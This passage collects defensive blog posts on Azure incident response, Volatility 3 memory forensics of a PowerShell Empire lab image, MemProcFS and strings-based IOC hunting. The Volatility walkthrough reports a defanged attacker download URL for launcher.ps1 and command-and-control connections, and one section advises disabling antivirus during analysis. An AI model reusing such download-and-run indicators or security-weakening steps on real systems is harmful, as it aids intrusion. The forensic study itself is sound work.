archiving and real-time streaming. Logs stored in a storage account appear in a structured format, often in JSON files within deeply nested directories, which can be accessed and processed using tools like Azure Storage Explorer. By effectively leveraging subscription logs and these configurations, Azure administrators can enhance monitoring, identify security issues, and ensure accountability in their environments. 
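When activity logs have been exported (for example, archived to a storage account as JSON), the same checks shown in the KQL queries above can be run offline. The following is a minimal Python sketch of that idea; the records are made-up examples and use only the OperationNameValue field of the real schema.

```python
from collections import Counter

# Hypothetical exported activity-log records, reduced to the one field
# the KQL queries above filter on.
records = [
    {"OperationNameValue": "MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE"},
    {"OperationNameValue": "MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE"},
    {"OperationNameValue": "MICROSOFT.COMPUTE/VIRTUALMACHINES/DELETE"},
    {"OperationNameValue": "MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE"},
]

# Equivalent of: AzureActivity | where OperationNameValue contains "DELETE"
deletes = [r for r in records if "DELETE" in r["OperationNameValue"]]

# Equivalent of: AzureActivity | where OperationNameValue contains "COMPUTE"
#                              | summarize count() by OperationNameValue
compute_counts = Counter(
    r["OperationNameValue"]
    for r in records
    if "COMPUTE" in r["OperationNameValue"]
)

print(len(deletes))               # number of delete operations found
print(compute_counts.most_common())
```

This kind of offline filtering is handy when a Log Analytics workspace was never configured and all you have is the archived JSON.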
-----------------------------------------------------------------------------------------------------------
We will cover more in the next blog. Until then, stay safe and keep learning.
Akash Patel
----------------------------------------------------------------------------------------------------------
Special Thanks (Iqra)
I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication!
https://www.linkedin.com/in/iqrabintishafi/
-------------------------------------------------------------------------------------------------------------

  • Understanding VM Types and Azure Network for IR

    Microsoft Azure provides a wide range of compute services, organized based on workload types and categorized as Infrastructure as a Service (IaaS) , Platform as a Service (PaaS) , or Software as a Service (SaaS) . For incident response and forensic investigations, the focus is typically on virtual machines (VMs)  and the related networking infrastructure. ----------------------------------------------------------------------------------------------------------- Virtual Machines: Types and Applications Azure offers various classes of virtual machines tailored for different workloads, all with specific performance characteristics. Here’s a breakdown of the most common VM types you'll encounter during an investigation: Series A (Entry Level) : Use Case : Development workloads, low-traffic websites. Examples : A1 v2, A2 v2. Series B (Burstable) : Use Case : Low-cost VMs with the ability to "burst" to higher CPU performance when needed. Examples : B1S, B2S. Series D (General Purpose) : Use Case : Optimized for most production workloads. Examples : D2as v4, D2s v4. Series F (Compute Optimized) : Use Case : Compute-intensive workloads, such as batch processing. Examples : F1, F2s v2. Series E, G, and M (Memory Optimized) : Use Case : Memory-heavy applications like databases. Examples : E2a v4, M8ms. Series L (Storage Optimized) : Use Case : High throughput and low-latency applications. Examples : L4s, L8s v2. Series NC, NV, ND (Graphics Optimized) : Use Case : Visualization, deep learning, and AI workloads. Examples : NC6, NV12s. Series H (High Performance Computing) : Use Case : Applications such as genomic research, financial modeling. Examples : H8, HB120rs v2. 
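The series-to-workload mapping above can be captured in a small lookup helper for quick triage notes. This is purely illustrative: the function name and the reduced mapping are mine, and the real Azure catalog has many more series and sizes.

```python
# Reduced mapping of Azure VM series to typical use case, taken from the
# list above (illustrative, not exhaustive).
VM_SERIES = {
    "A": "Development workloads, low-traffic websites",
    "B": "Burstable, low-cost VMs",
    "D": "General-purpose production workloads",
    "F": "Compute-intensive workloads (e.g., batch processing)",
    "E": "Memory-heavy applications like databases",
    "L": "High-throughput, low-latency storage workloads",
    "N": "Visualization, deep learning, and AI workloads",
    "H": "High performance computing (genomics, financial modeling)",
}

def series_of(vm_size):
    """Return the use-case description for a VM size string like 'D2s v4'."""
    return VM_SERIES.get(vm_size[0].upper(), "Unknown series")

print(series_of("D2s v4"))
print(series_of("NC6"))
```

Knowing the series of a compromised VM tells you at a glance what kind of workload (and therefore what kind of data) it likely hosted.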
https://azure.microsoft.com/en-us/pricing/details/virtual-machines/windows/ https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/ VM Storage: Managed Disks Managed Disks  in Azure operate similarly to physical disks but come with a few key distinctions relevant for incident response: Types of Managed Disks : Standard HDD : Slow, low-cost. Standard SSD : Standard for most production workloads. Premium SSD : High performance, better suited for intensive workloads. Ultra Disk : Highest performance for demanding applications. Each VM can have multiple managed disks , including an OS disk, temporary disk (for short-term storage), and one or more data disks. Forensics often involves snapshotting the OS disk  of a compromised VM, attaching that snapshot to a new VM for further analysis. Costs are associated with: Disk type and size. Snapshot size (critical for investigations). Outbound data transfers (when retrieving forensic data). I/O operations (transaction costs). https://learn.microsoft.com/en-us/azure/virtual-machines/managed-disks-overview https://learn.microsoft.com/en-us/azure/virtual-machines/disks-types ----------------------------------------------------------------------------------------------------------- Azure Virtual Network (VNet): The Glue Behind Azure Resources An Azure Virtual Network ( VNet)  allows Azure resources like VMs to communicate with each other and with external networks . During an incident response, it’s essential to understand the network topology  to see how resources were connected, what traffic was allowed, and where vulnerabilities might have existed. Key points about VNets: Private Addressing : Azure assigns a private IP range (typically starting with 10.x.x.x). Public IP Addresses : Required for internet communication, but comes with extra charges. On-Premises Connectivity : Point-to-Site VPN : Connects individual computers to Azure. Site-to-Site VPN : Connects an on-premises network to Azure. 
Azure ExpressRoute : Private connections that bypass the internet.
https://learn.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview
-----------------------------------------------------------------------------------------------------------
Network Security Groups (NSG): Traffic Control and Incident Response
NSG Overview : Azure uses NSGs to protect resources, like virtual machines (VMs), by allowing or blocking traffic based on several criteria:
Source/Destination IP : IP addresses from which the traffic originates or to which it is sent.
Source/Destination Port : The network ports involved in the connection.
Protocol : The communication protocol (e.g., TCP, UDP).
Rule Prioritization : NSG rules are processed in order of their priority, with lower numbers having higher priority. Custom rules have priorities ranging from 100 to 4096, while Azure-defined default rules have priorities in the 65000 range.
Incident Response Tip : Ensure that firewall rules are correctly prioritized. A common issue during investigations is discovering that a misconfigured or improperly prioritized rule allowed malicious traffic to bypass protections.
Flow Logs : Network flow logs, which capture traffic information, are essential for understanding traffic patterns and investigating suspicious activity. Flow logs are generated every minute; the first 5GB per month is free, and after that the cost is $0.50 per GB plus storage charges.
Example : If an attack involved unauthorized access through a compromised port, flow logs would help you trace the origin and nature of the traffic, providing critical forensic data.
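To make the priority behavior concrete, here is a toy first-match evaluator in Python. The rule set and field layout are simplified inventions for illustration; real NSG rules also match on source/destination IP and protocol.

```python
# Simplified NSG rules: lower priority number = evaluated first, first match wins.
rules = [
    {"priority": 300,   "dest_port": 3389, "action": "Deny"},   # block RDP
    {"priority": 100,   "dest_port": 443,  "action": "Allow"},  # allow HTTPS
    {"priority": 65000, "dest_port": "*",  "action": "Deny"},   # default catch-all
]

def evaluate(dest_port):
    """Return the action of the first rule (by ascending priority) that matches."""
    for rule in sorted(rules, key=lambda r: r["priority"]):
        if rule["dest_port"] in ("*", dest_port):
            return rule["action"]
    return "Deny"  # implicit deny if nothing matched

print(evaluate(443), evaluate(3389), evaluate(8080))
```

Note how an allow-all rule carelessly added at, say, priority 200 would match before the RDP deny at 300; that is exactly the kind of ordering mistake the incident response tip above warns about.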
https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview#network-security-groups ----------------------------------------------------------------------------------------------------------- Network Virtual Appliances (NVA): Advanced Network Security Azure provides additional options for advanced traffic management and security beyond basic NSGs: Azure Load Balancer : Distributes incoming network traffic across multiple resources to balance load. Azure Firewall : Offers advanced filtering, including both stateful network and application-layer inspections. Application Gateway : Protects web applications by filtering out vulnerabilities like SQL injection and cross-site scripting (XSS). VPN Gateway : Connects on-premises networks securely to Azure. Many third-party Network Virtual Appliances  are also available on the Azure Marketplace , such as firewalls, VPN servers, and routers, which can be vital components in your investigation. https://azuremarketplace.microsoft.com/en-us/marketplace/apps/category/networking?page=1&subcategories=all ----------------------------------------------------------------------------------------------------------- Azure Storage: Central to Forensics and Logging Azure storage accounts  are integral to how logs and other data are stored during investigations. Proper storage setup ensures data retention and availability for analysis. Storage Account Types : Blob Storage : Scalable object storage for unstructured data, such as logs or multimedia. File Storage : Distributed file system storage. Queue Storage : For message storage and retrieval. Table Storage : NoSQL key-value store, now part of Azure Cosmos DB . Blob Storage : Blobs  (Binary Large Objects) are highly versatile and commonly used for storing large amounts of unstructured data, such as logs during forensic investigations. 
Blobs come in three types:
Block Blobs : Ideal for storing text and binary data; can handle up to 4.75TB per file.
Append Blobs : Optimized for logging, where data is appended rather than overwritten.
Page Blobs : Used for random-access data, like Virtual Hard Drive (VHD) files.
Direct Access and Data Transfers : With the appropriate permissions, data stored in blob storage can be accessed over the internet via HTTP or HTTPS. Azure provides tools like AzCopy and Azure Storage Explorer to facilitate the transfer of data in and out of blob storage.
Example : Investigators may need to download logs or snapshots stored in blobs for offline analysis. Using AzCopy or Azure Storage Explorer, these files can be easily transferred for examination.
-----------------------------------------------------------------------------------------------------------
How This Script Helps: VM Information for Analysis : The extracted data (VM ID and VM size) is essential for identifying and analyzing the virtual machines involved in an incident. The script below pulls Microsoft.Compute entries from the activity log and extracts each VM's ID and size from the logged response body:

$results = Get-AzLog -ResourceProvider "Microsoft.Compute" -DetailedOutput
$results.Properties | ForEach-Object { $_ } | ForEach-Object {
    # Each property bag may carry the ARM response body as a JSON string
    $contents = $_.content
    if ($contents -and $contents.ContainsKey("responseBody")) {
        $fromjson = ($contents.responseBody | ConvertFrom-Json)
        $newobj = New-Object psobject
        $newobj | Add-Member NoteProperty VmId $fromjson.properties.vmId
        $newobj | Add-Member NoteProperty VmSize $fromjson.properties.hardwareProfile.vmSize
        $newobj
    }
}

-----------------------------------------------------------------------------------------------------------
Conclusion: In Azure, combining effective Network Security Group (NSG) management with automated VM log extraction provides essential visibility for incident response. Understanding traffic control through NSGs and using PowerShell scripts for VM log retrieval empowers organizations to investigate security incidents efficiently, even without advanced security tools like a SIEM.
Akash Patel
-------------------------------------------------------------------------------------------------------------

  • "Step-by-Step Guide to Uncovering Threats with Volatility: A Beginner’s Memory Forensics Walkthrough"

Alright, let's dive into a straightforward guide to memory analysis using Volatility. Memory forensics is a vast field, but I'll take you through an overview of some core techniques to get valuable insights. Let's go.
Note: This is not a complete analysis; it's an overview of key steps. In memory forensics, findings can be hit or miss; sometimes we uncover valuable data, sometimes we don't, so it's essential to work carefully.

Step 1: Basic System Information with windows.info
Let's start by getting a basic overview of the memory image using the windows.info plugin. This gives us essential details like the operating system version, kernel debugging info, and more, which helps us ensure the plugins we'll use are compatible.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.info

Step 2: Listing Active Processes with windows.pslist
Now, I'll list all active processes using windows.pslist and save the output. This helps identify running processes, their parent-child relationships, and gives a general look at what's happening in memory.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pslist > ./testing/pslist.txt
I'm storing the output so we can refer back to it easily. With pslist, we can identify processes and their parent-child links, which can help detect suspicious activity if any processes don't align with expected behavior. (I am using SANS reference material to verify that processes align with their expected parents.)

Step 3: Finding Hidden Processes with windows.psscan
Next, we move to windows.psscan, which scans for process structures, including hidden ones that pslist might miss. This is especially useful for finding malware or processes that don't show up in regular listings.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.psscan > ./testing/psscan.txt
After running psscan, I'll sort and compare the results with pslist to see if anything stands out.
A quick diff can reveal processes that may be hiding:
sort ./testing/psscan.txt > ./testing/a.txt
sort ./testing/pslist.txt > ./testing/b.txt
diff ./testing/a.txt ./testing/b.txt
In my analysis, I found some suspicious entries like whoami.exe and duplicate mscorsvw.exe processes, which I'll dig into further to verify their legitimacy. (Later analysis showed mscorsvw.exe is legitimate.)

Step 4: Examining Process Trees with windows.pstree
To get a clearer view of how processes are linked, I'll use windows.pstree. This shows the process hierarchy, making it easier to spot unusual or suspicious chains, like a random process launching powershell.exe under a legitimate parent.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.pstree > ./testing/pstree.txt
During my analysis, I noticed a powershell.exe instance that used encoded commands to connect to a suspicious IP (http[:]//192.168.200.128[:]3000/launcher.ps1). This could be an indicator of compromise, possibly indicating a malicious script being downloaded and executed.

Step 5: Checking Command-Line Arguments with windows.cmdline
Now, I'll use the windows.cmdline plugin to check command-line arguments for processes. This is helpful because attackers often use command-line parameters to hide activity.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.cmdline > ./testing/cmdline.txt
Here, I'm filtering out standard system paths (System32) to make it easier to focus on anything that might look unusual. If there's any suspicious execution path, this command can help spot it quickly. (Keep in mind that filtering out System32 doesn't mean an attacker can't have run processes from there.)
cat ./testing/cmdline.txt | grep -i -v 'system32'

Step 6: Reviewing Security Identifiers with windows.getsids
To understand the permissions and user context of the processes we've identified as suspicious, I'll check their Security Identifiers (SIDs) using windows.getsids.
This can tell us who ran a specific process, helping narrow down potential attacker accounts.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.getsids > ./testing/getsids.txt
I'm searching for the user that initiated each suspicious process to see if it's linked to an unauthorized or unusual account. (For example, we have already identified powershell.exe and cmd.exe executions above.) So I searched through the text file:
cat ./testing/getsids.txt | grep -i cmd.exe

Step 7: Checking Network Connections with windows.netscan
Next, I'll scan for network connections with windows.netscan to see if any suspicious processes are making unauthorized connections. This is crucial for detecting any malware reaching out to a command-and-control (C2) server.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.netscan > ./testing/netscan.txt
In this case, I found some closed connections to a suspicious IP (192.168.200.128:8443), initiated by powershell.exe. This further confirms the likelihood of malicious activity.

Step 8: Module Analysis with windows.ldrmodules
To see if there are unusual DLLs or modules loaded into suspicious processes, I'll use windows.ldrmodules. This can help catch injected modules or rogue DLLs.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.ldrmodules > ./testing/ldrmodule.txt
cat ./testing/ldrmodule.txt | egrep -i 'cmd|powershell'
In very simple terms: if you see even a single "False" entry, you have to analyze it manually to determine whether it is legitimate. (You will mostly get a lot of false positives; this is where the DFIR examiner comes in to decide what is legitimate.)

Step 9: Detecting Malicious Code with windows.malfind
Finally, I'll scan for potential malicious code within processes using windows.malfind. This plugin helps by detecting suspicious memory sections marked as PAGE_EXECUTE_READWRITE, which attackers often use.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind > ./testing/malfind.txt
Next, I looked for the PIDs of the powershell.exe/cmd.exe processes so I can dump them and run an antivirus scan, or use strings or bstrings against the dumps.
cat ./testing/malfind.txt | grep -i 'PAGE_EXECUTE_READWRITE'
I identified the PowerShell PIDs and dumped the related malfind regions one by one for PIDs 5908, 6164, 8308, and 1876 (as seen in the output):
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.malfind --dump --pid 5908
Once done, you can run strings or bstrings to identify readable content in the dumps, run a full antivirus scan against them, or hand them to a reverse engineer; that's up to you.
(There are more commands available if you want to dig deeper; this is only an overview. You can find more commands in my previous article.)
https://www.cyberengage.org/post/unveiling-volatility-3-a-guide-to-extracting-digital-artifacts
--------------------------------------------------------------------------------------------------------
Digging into Registry Hives
Step 1
Moving on to the registry, I'll first check which hives are available using windows.registry.hivelist. Important hives like NTUSER.DAT can hold valuable info, including recently accessed files.
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.hivelist
In the output we can see the two most important hives: UsrClass.dat and NTUSER.DAT.
First, get the offset of each hive; in our case UsrClass.dat is at 0x9f0c25e75000 and NTUSER.DAT is at 0x9f0c25be8000.
Then, to check which data is available under these two hives:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000
As the output shows, only a little data is intact. After this you can do one of two things: dump these hives and use a tool like Registry Explorer to analyze them further, just like a normal Windows registry analysis, or dump all the output into a text file and analyze it there; your choice.
Let's go with the text file:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25be8000 --recurse > ./testing/ntuser.txt

Step 2: Checking User Activity with the UserAssist Plugin
The userassist plugin helps verify if specific applications or files were executed by the user, like PowerShell commands. Results may vary, and in this case it might not yield any findings.
Let's suppose the userassist plugin does not work out for me: then use the NTUSER.DAT method above, dumping all keys into a .txt file using --recurse and analyzing manually (just change the offset). Example:
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.registry.printkey --offset 0x9f0c25e75000 --recurse > ./testing/usrclss.txt

Step 3: Scanning for Key Files with Filescan
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.filescan > ./testing/filescan.txt
This step is not strictly necessary (you can simply use the first and second steps above to extract and dump the hives for analysis with Registry Explorer, or examine them manually; it's up to you), but here is why it's useful. Suppose you ran filescan, saved the output, and want to check for specific hives such as the SAM or SECURITY hives:
cat ./testing/filescan.txt | grep -i 'usrclass.dat' | grep 'analyst'
This command greps for usrclass.dat and then for the user "analyst", because the PowerShell activity ran under the user account "analyst". After going through the output, I identified multiple hives that might be useful. I noted all the offsets, and what I am going to do is dump all the hives and analyze them using Registry Explorer.

Step 4: Dumping Specific Files (Like NTUSER.DAT, UsrClass.dat)
python3 vol.py -f /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem windows.dumpfiles --virtaddr (supply the offset noted from filescan)
Use this for additional files or executables of interest. If data is retrieved, analyze it with tools like RegRipper.

Step 5
Similarly, you can search for the keyword "history" in filescan.txt. If you find history files related to a browser, or psreadline.txt, dump them out and analyze them. If you are dumping browser history, you can use BrowsingHistoryView from NirSoft.

Step 6: Log Analysis
You can search for logs; in our case:
cat ./testing/filescan.txt | grep -i '.evtx'
You can dump the logs and use EvtxECmd to parse and analyze them.
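The sort/diff/grep pipelines used throughout this walkthrough can also be reproduced with a few lines of Python, which is handy when you want repeatable triage. The sketch below runs on made-up sample lines in a simplified column layout (real Volatility output has more fields): it finds processes that appear in psscan but not in pslist, and collects PIDs flagged with PAGE_EXECUTE_READWRITE in malfind output.

```python
def pid_name_pairs(lines):
    """Extract (PID, name) from simplified pslist/psscan rows: 'PID PPID Name ...'."""
    pairs = set()
    for line in lines:
        parts = line.split()
        if len(parts) >= 3 and parts[0].isdigit():
            pairs.add((int(parts[0]), parts[2]))
    return pairs

pslist = ["4 0 System", "732 4 smss.exe"]
psscan = ["4 0 System", "732 4 smss.exe", "2216 732 hidden.exe"]

# Equivalent of sorting both output files and diffing them
hidden = pid_name_pairs(psscan) - pid_name_pairs(pslist)

malfind = [
    "5908 powershell.exe 0x1a0000 PAGE_EXECUTE_READWRITE",
    "1200 explorer.exe 0x300000 PAGE_READONLY",
    "6164 powershell.exe 0x2b0000 PAGE_EXECUTE_READWRITE",
]

# Equivalent of: grep -i 'PAGE_EXECUTE_READWRITE' malfind.txt
rwx_pids = sorted({int(l.split()[0]) for l in malfind if "PAGE_EXECUTE_READWRITE" in l})

print(hidden)    # processes only visible to psscan
print(rwx_pids)  # candidate PIDs for windows.malfind --dump --pid
```

In practice you would feed in the saved ./testing/*.txt files instead of these sample lists; the logic is the same.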
-------------------------------------------------------------------------------------------------------------
Once done with Volatility, here is what I always do: run strings or bstrings.exe against the memory image using the IOCs I have identified, to look for extra hits in case I missed something. Example (earlier I found launcher.ps1 among the IOCs):
strings /mnt/d/practice_powershell_empire/practice_powershell_empire.vmem | grep -i 'launcher.ps1'
I also searched for the IP we identified as an IOC. This is what I do after running Volatility; you don't have to, but it's up to you!
For how to run strings/bstrings.exe, there is an article I created; check the link below:
https://www.cyberengage.org/post/memory-forensics-using-strings-and-bstrings-a-comprehensive-guide
-------------------------------------------------------------------------------------------------------------
Next, I ran the MemProcFS Analyzer:
Dirty Logs in MemProcFS
Examining logs, such as those found in MPLogs\Dirty\, reveals possible threats, like PowerShell Grampus or Mimikatz. There are legitimate files as well; you have to determine whether each hit is legitimate or not.
For how to run MemProcFS, there is an article I created; check the link below:
https://www.cyberengage.org/post/memprocfs-memprocfs-analyzer-comprehensive-analysis-guide
-------------------------------------------------------------------------------------------------------------
Conclusion
Alright, so we've walked through a high-level approach to memory forensics here. Each tool and plugin we used, like Volatility and MemProcFS, gave us a way to dig into different artifacts, whether it was registry entries, logs, or user files. Some methods hit, some miss; memory analysis can be like that, but the key is to stay thorough.
Remember, you may or may not find everything you're looking for. But whatever you do uncover, like IOCs or specific user actions, adds to your investigation. Just keep at it, keep testing, and let each artifact guide your next step.
This is all part of the process—memory forensics is about making the most out of what you have, one artifact at a time. Akash Patel

  • MemProcFS/MemProcFS Analyzer: Comprehensive Analysis Guide

MemProcFS is a powerful memory forensics tool that allows forensic investigators to mount raw memory images as a virtual file system. This enables direct analysis of memory artifacts without the need for heavy processing tools. It simplifies the process by converting the memory dump into a filesystem with readable structures like processes, drivers, services, etc. This guide covers best practices for using MemProcFS, from mounting a memory image to performing in-depth analysis using various tools and techniques.
--------------------------------------------------------------------------------------------------------
Mounting the Image with MemProcFS
The basic command to mount a memory dump using MemProcFS is:
MemProcFS.exe -device c:\temp\memdump-win10x64.raw
This mounts the memory dump as a virtual file system. However, the best way to use MemProcFS is by taking advantage of its built-in Yara rules provided by Elastic. These Yara rules allow you to scan for Indicators of Compromise (IOCs) such as malware signatures, suspicious files, and behaviors within the memory image.
Command with Elastic Yara Rules
To mount a memory image and enable Elastic's Yara rules, use the following command:
MemProcFS.exe -device c:\temp\memdump-win10x64.raw -forensic 1 -license-accept-elastic-license-2.0
The -forensic 1 flag ensures that the image is mounted with forensic processing enabled, while the -license-accept-elastic-license-2.0 flag accepts Elastic's license terms for the built-in Yara rules.
--------------------------------------------------------------------------------------------------------
Methods for Analysis
There are multiple ways to analyze the mounted memory image. Below are the three most common methods:
Using WSL (Windows Subsystem for Linux)
Using Windows Explorer
Using the MemProcFS Analyzer Suite

1. Analyzing with WSL (Windows Subsystem for Linux)
One of the most efficient ways to analyze the memory dump is by using the Linux shell within Windows, i.e., WSL.
By doing this, you can easily use Linux tools such as grep, awk, and strings to filter and search through the mounted image.
Step 1: Create a Directory in WSL
First, create a directory in WSL where you will mount the memory image:
sudo mkdir /mnt/d
Step 2: Mount the Windows Memory Image to WSL
Next, mount the Windows memory image to the directory you just created. Assuming the image is mounted on the M: drive in Windows, you can mount it to WSL with the following command:
sudo mount -t drvfs M: /mnt/d
This command mounts the M: drive (where MemProcFS has mounted the memory image) to the /mnt/d directory in WSL. Now you can access the mounted memory dump via WSL for further analysis using grep, awk, strings, and other Linux-based utilities.
--------------------------------------------------------------------------------------------------------
2. Analyzing with Windows Explorer
MemProcFS makes it easy to browse the memory image using Windows Explorer by exposing critical memory artifacts in a readable format. Here's what each folder contains:
Key Folders and Files
Sys Folder :
Proc : proc.txt lists processes running in memory; proc-v.txt displays detailed command-line information for the processes.
Drivers : drivers.txt contains information about drivers loaded in memory.
Net : netstat.txt lists network information at the time of acquisition; netstat-v.txt provides details about network paths used by processes.
Services : services.txt lists installed services; the /byname subfolder provides detailed information for each service.
Tasks : task.txt contains information about scheduled tasks in memory.
Name Folder : Contains folders for each process with detailed information such as files, handles, modules, and Virtual Address Descriptors (VADs).
PID Folder : Similar to the Name folder, but uses Process IDs (PIDs) instead of process names.
Registry Folder : Contains all registry keys and values available in memory during the dump.
Forensic Folder :
CSV files (e.g., pslist.csv): Easily analyzable using Eric Zimmerman's tools.
Timeline : Contains timestamped events related to memory activity, available in both .csv and .txt formats.
Files Folder : Attempts to reconstruct the system's C: drive from memory.
NTFS Folder : Attempts to reconstruct the NTFS file system structure from memory.
Yara Folder : Contains results from Yara scans, populated if Yara scanning is enabled.
FindEvil Folder : Flags potentially malicious findings; you must determine whether each file is malicious or legitimate.
--------------------------------------------------------------------------------------------------------
3. Using the MemProcFS Analyzer Suite
For more automated analysis, MemProcFS comes with an Analyzer Suite that simplifies the process by running pre-configured scripts to extract and analyze data from the memory image.
Step 1: Download and Install the Analyzer Suite
First, download the MemProcFS Analyzer Suite. Inside the suite folder, you will find a script named updater.ps1. Run this script in PowerShell to download all the necessary binaries and tools for analysis.
Step 2: Run the Analyzer
Once the setup is complete, you can begin your automated analysis by running the MemProcFS-Analyzer.ps1 script:
.\MemProcFS-Analyzer.ps1
This will launch the GUI for MemProcFS Analyzer. You can then select the memory image and (optionally) the pagefile if it is available. Once you run the analysis, MemProcFS will automatically extract and analyze the data.
--------------------------------------------------------------------------------------------------------
Output and Results
After running the MemProcFS analysis, the results will be saved in a folder under the script directory. Make sure that you have 7-Zip installed, as some of the output may be archived. The default password for the archives is MemProcFS.
Key Output Files :
Parsed Files : Contains all the data successfully parsed by MemProcFS.
Unparsed Files : Lists data that could not be parsed by the tool. For further analysis, you can manually review these files using tools like Volatility 3 or by leveraging WSL tools.
By reviewing both parsed and unparsed files, you can ensure that no critical information is missed during the analysis.

--------------------------------------------------------------------------------------------------------

Considerations and Best Practices

Antivirus Interference
If you are running MemProcFS Analyzer in an environment with antivirus protection, the antivirus software may block certain forensic tools. To avoid interruptions, it is recommended to create exclusions for the tools used by MemProcFS Analyzer or, if necessary, temporarily disable the antivirus software during the analysis.

Manual Review of Unparsed Data
While MemProcFS automates many aspects of memory forensics, it is crucial to manually check files that were not parsed during the automated process. These files can be analyzed using other memory forensic tools like Volatility 3, or through manual inspection using WSL commands.

--------------------------------------------------------------------------------------------------------

Conclusion
MemProcFS offers a powerful and efficient way to analyze memory dumps by mounting them as a virtual file system. This method allows for both manual and automated analysis using familiar tools like grep, awk, strings, and the MemProcFS Analyzer Suite. Whether you are performing quick IOC triage or a detailed forensic analysis, MemProcFS can handle a wide range of memory artifacts, from processes and drivers to network activity and registry keys.

Key Takeaways :
MemProcFS is versatile, offering both manual and automated analysis methods.
Use Elastic's built-in Yara rules to enhance your malware detection capabilities.
Leverage WSL or Windows Explorer to manually browse and analyze memory artifacts.
The Analyzer Suite automates much of the forensic process, saving time and effort.
Always review unparsed files to ensure nothing critical is missed. Akash Patel

  • Memory Forensics Using Strings and Bstrings: A Comprehensive Guide

Memory forensics involves extracting and analyzing data from a computer's volatile memory (RAM) to identify potential Indicators of Compromise (IOCs) or forensic artifacts crucial for incident response. This type of analysis can uncover malicious activity, such as hidden malware, sensitive data, and encryption keys, even after a machine has been powered off. Two key tools frequently used in this process are Strings and Bstrings. While both help extract readable characters from memory dumps, they offer distinct features that make them suitable for different environments. In this article, we'll cover the functionality of both tools, provide practical examples, and explore how they can aid in quick identification of IOCs during memory forensics.

Tools Overview

1. Strings
Functionality : Extracts printable characters from files or memory dumps.
Usage : Primarily used in Linux/Unix environments, although it can be utilized on other systems via compatible setups (for example, WSL on Windows).
Key Features :
Lightweight and easy to use.
Can be combined with search filters like grep to narrow down relevant results.

2. Bstrings (by Eric Zimmerman)
Functionality : Similar to Strings, but designed specifically for Windows environments. It offers additional features such as regex support and advanced filtering.
Key Features :
Regex support for powerful search capabilities.
Windows-native, making it ideal for handling Windows memory dumps.
Capable of offset-based searches.

Basic Usage

1. Using Strings in Linux/Unix Environments
The strings tool is commonly used to extract printable (readable) characters from binary files, such as memory dumps. Its core functionality is simple but powerful when combined with additional filters, such as grep.

Example: Extracting IP Addresses
If you are hunting for a specific IOC, such as an IP address in a memory dump, you can extract printable characters and pipe the results through grep to filter the output.
strings <file> | grep -i <pattern>

Example for an IP address :
strings mem.dump | grep -i 192\.168\.0\.
This command will extract any printable characters from the memory dump (mem.dump) and filter the results for IP addresses beginning with 192.168.0.

Example for a filename :
strings mem.dump | grep -i akash\.exe
Here, it searches for the filename akash.exe within the memory dump.

Note : With bstrings.exe on Windows, the same search can be done without escape characters (\). This makes it easier to input IP addresses or filenames directly:
IP address : 192.168.0
Filename : akash.exe

-----------------------------------------------------------------------------------------------

2. Contextual Search
Finding an IOC in a memory dump is only the beginning. To better understand the context in which the IOC appears, you may want to see the lines surrounding the match. This can give insights into related processes, network connections, or file paths.
strings <file> | grep -i -C5 <pattern>
Example :
strings mem.dump | grep -i -C5 akash.exe
The -C5 option tells grep to show five lines above and five lines below the matching IOC (akash.exe). This helps to investigate the surrounding artifacts and provides additional context for analysis.

-----------------------------------------------------------------------------------------------

3. Advanced Usage with Offsets
When you use strings alongside Volatility (another powerful memory forensics framework), it's essential to retrieve offsets. Offsets allow you to pinpoint the exact location of an artifact within the memory image, which is vital for correlating with other forensic evidence.
strings -tx <file> | grep -i -C5 <pattern>
Example :
strings -tx mem.dump | grep -i -C5 akash.exe
Here, the -tx option prints the hexadecimal offset of each match within the file, allowing for more precise analysis, especially when using memory analysis tools like Volatility.
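The pipelines above can be exercised end to end against a synthetic dump. In this self-contained sketch, `grep -aoE '[[:print:]]{4,}'` stands in for the strings binary so the example runs even where binutils is not installed; the dump contents and IOCs (akash.exe, 192.168.0.77) are fabricated for illustration:

```shell
# Build a tiny fake "memory dump": printable IOCs surrounded by binary noise
printf 'GARBAGE\000\001\002connect 192.168.0.77\000\003path=C:\\temp\\akash.exe\000noise' > /tmp/mem.dump

# Extract printable runs (a strings-like pass) and filter for an IOC,
# case-insensitively, mirroring: strings mem.dump | grep -i akash\.exe
grep -aoE '[[:print:]]{4,}' /tmp/mem.dump | grep -i 'akash\.exe'

# Byte offset of each match (decimal), analogous in spirit to strings -tx,
# for correlating hits with other tools such as Volatility
grep -aboE '192\.168\.0\.[0-9]+' /tmp/mem.dump
```

On a real dump you would substitute the actual image path and your own IOCs, and append -C5 to the grep stage to pull surrounding context as described above.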
-----------------------------------------------------------------------------------------------

Using Bstrings.exe in Windows
